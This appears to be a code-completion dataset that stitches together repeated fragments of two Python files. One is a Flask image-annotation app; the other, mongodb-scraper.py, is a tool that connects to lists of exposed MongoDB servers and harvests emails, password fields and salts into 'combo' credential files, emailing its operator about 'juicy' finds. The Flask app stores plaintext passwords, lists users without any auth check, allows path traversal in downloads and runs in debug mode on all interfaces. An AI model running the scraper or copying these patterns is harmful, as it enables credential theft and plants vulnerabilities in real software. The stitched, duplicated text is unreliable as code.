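# library's linecache module offers the same lookup with caching; an equivalent
# call (left here as a comment so module behaviour is unchanged) would be:
#
#     import linecache
#     line = linecache.getline(the_file_path, line_number)   # '' when out of range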
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# call the add method to stage the new row
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify | 080, debug=True)
# app.run(debug=True)
@app.route('/page_list', me | conditional_block |
app.py | '__getitem__'):
return dict(o)
raise TypeError('%r is not JSON serializable' % o)
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# call the add method to stage the new row
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# create a new Excel file
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return jsonify('success')
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
| thods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# call the add method to stage the new row
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify | for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', me | identifier_body |
app.py | GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# call the add method to stage the new row
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# create a new Excel file
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return jsonify('success')
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# call the add method to stage the new row
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key= | True | identifier_name |
|
mongodb-scraper.py | ed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotating file handler, so we won't have an endless log file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
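        # data.json is expected to be a plain JSON array of host strings,
        # e.g. ["10.0.0.5", "203.0.113.7:27017"] -- the example values are
        # made up; the format is inferred from the json.load() above and from
        # MongoClient(ip, ...) in scrape().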
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
|
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
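    # _load_settings()/_notify() read settings.json, which is not included with
    # the scraper. Judging purely from the keys accessed above, it is assumed
    # to look roughly like this (all values are placeholders; only the key
    # names come from the code):
    #
    #   {
    #       "email": {
    #           "threshold": 10000,
    #           "from": "alerts@example.com",
    #           "to": "me@example.com",
    #           "smtp": {
    #               "host": "smtp.example.com",
    #               "port": 587,
    #               "user": "alerts@example.com",
    #               "password": "secret"
    #           }
    #       }
    #   }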
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Have I already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\ | try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return | identifier_body |
mongodb-scraper.py | = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotating file handler, so we won't have an endless log file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def | (self):
for ip in self.ips:
# Have I already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
# Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
# Is that a column we're interested into?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
# If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
# Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info | scrape | identifier_name |
mongodb-scraper.py | ed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotating file handler, so we won't have an endless log file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists |
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
